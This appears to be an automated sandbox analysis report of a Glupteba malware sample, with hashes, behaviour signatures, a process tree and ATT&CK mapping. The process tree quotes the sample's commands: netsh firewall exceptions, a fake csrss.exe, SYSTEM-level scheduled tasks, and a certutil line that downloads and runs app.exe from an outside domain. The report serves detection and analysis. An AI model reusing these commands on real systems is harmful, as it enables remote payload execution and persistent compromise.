Analysis

  • max time kernel
    180s
  • max time network
    201s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    12-05-2022 11:41

General

  • Target

    e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe

  • Size

    3.9MB

  • MD5

    36b916eede950172b262c888b1e82a72

  • SHA1

    7cacba9f2eaff7584cf6c06c8f5b23853e77cc79

  • SHA256

    e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76

  • SHA512

    ffddad17c0879e317b09e72482710e10d72d4b6aae948661d43a34488e4f1ef098b84292da6ef8eb62dbdaa4327f53fbde9ed5eb8c2ac9087cb1cf8de5332115

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 6 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe
    "C:\Users\Admin\AppData\Local\Temp\e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4676
    • C:\Users\Admin\AppData\Local\Temp\e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe
      "C:\Users\Admin\AppData\Local\Temp\e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:5080
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1932
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes
            4⤵
              PID:3544
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3952
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:2348
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:1616
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:2492
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:2876
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 752
            3⤵
            • Program crash
            PID:4768
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 816
          2⤵
          • Program crash
          PID:3716
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4528
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4676 -ip 4676
        1⤵
          PID:1580
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1664 -ip 1664
          1⤵
            PID:1508

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Execution

          Scheduled Task

          1
          T1053

          Persistence

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Scheduled Task

          1
          T1053

          Privilege Escalation

          Scheduled Task

          1
          T1053

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            Filesize

            1.7MB

            MD5

            13aaafe14eb60d6a718230e82c671d57

            SHA1

            e039dd924d12f264521b8e689426fb7ca95a0a7b

            SHA256

            f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

            SHA512

            ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

          • C:\Windows\rss\csrss.exe
            Filesize

            3.9MB

            MD5

            36b916eede950172b262c888b1e82a72

            SHA1

            7cacba9f2eaff7584cf6c06c8f5b23853e77cc79

            SHA256

            e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76

            SHA512

            ffddad17c0879e317b09e72482710e10d72d4b6aae948661d43a34488e4f1ef098b84292da6ef8eb62dbdaa4327f53fbde9ed5eb8c2ac9087cb1cf8de5332115

          • C:\Windows\rss\csrss.exe
            Filesize

            3.9MB

            MD5

            36b916eede950172b262c888b1e82a72

            SHA1

            7cacba9f2eaff7584cf6c06c8f5b23853e77cc79

            SHA256

            e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76

            SHA512

            ffddad17c0879e317b09e72482710e10d72d4b6aae948661d43a34488e4f1ef098b84292da6ef8eb62dbdaa4327f53fbde9ed5eb8c2ac9087cb1cf8de5332115

          • memory/1616-148-0x0000000000000000-mapping.dmp
          • memory/1664-136-0x0000000000400000-0x000000000515F000-memory.dmp
            Filesize

            77.4MB

          • memory/1664-135-0x0000000007150000-0x000000000784C000-memory.dmp
            Filesize

            7.0MB

          • memory/1664-134-0x0000000006DA4000-0x000000000714D000-memory.dmp
            Filesize

            3.7MB

          • memory/1664-133-0x0000000000000000-mapping.dmp
          • memory/1932-139-0x0000000000000000-mapping.dmp
          • memory/2348-147-0x0000000000000000-mapping.dmp
          • memory/2492-149-0x0000000000000000-mapping.dmp
          • memory/2696-137-0x0000000000000000-mapping.dmp
          • memory/2876-151-0x0000000000000000-mapping.dmp
          • memory/3544-140-0x0000000000000000-mapping.dmp
          • memory/3952-144-0x0000000007400000-0x00000000077A9000-memory.dmp
            Filesize

            3.7MB

          • memory/3952-145-0x0000000007800000-0x0000000007EFC000-memory.dmp
            Filesize

            7.0MB

          • memory/3952-146-0x0000000000400000-0x000000000515F000-memory.dmp
            Filesize

            77.4MB

          • memory/3952-141-0x0000000000000000-mapping.dmp
          • memory/4676-130-0x0000000006E7E000-0x0000000007227000-memory.dmp
            Filesize

            3.7MB

          • memory/4676-132-0x0000000000400000-0x000000000515F000-memory.dmp
            Filesize

            77.4MB

          • memory/4676-131-0x0000000007230000-0x000000000792C000-memory.dmp
            Filesize

            7.0MB

          • memory/5080-138-0x0000000000000000-mapping.dmp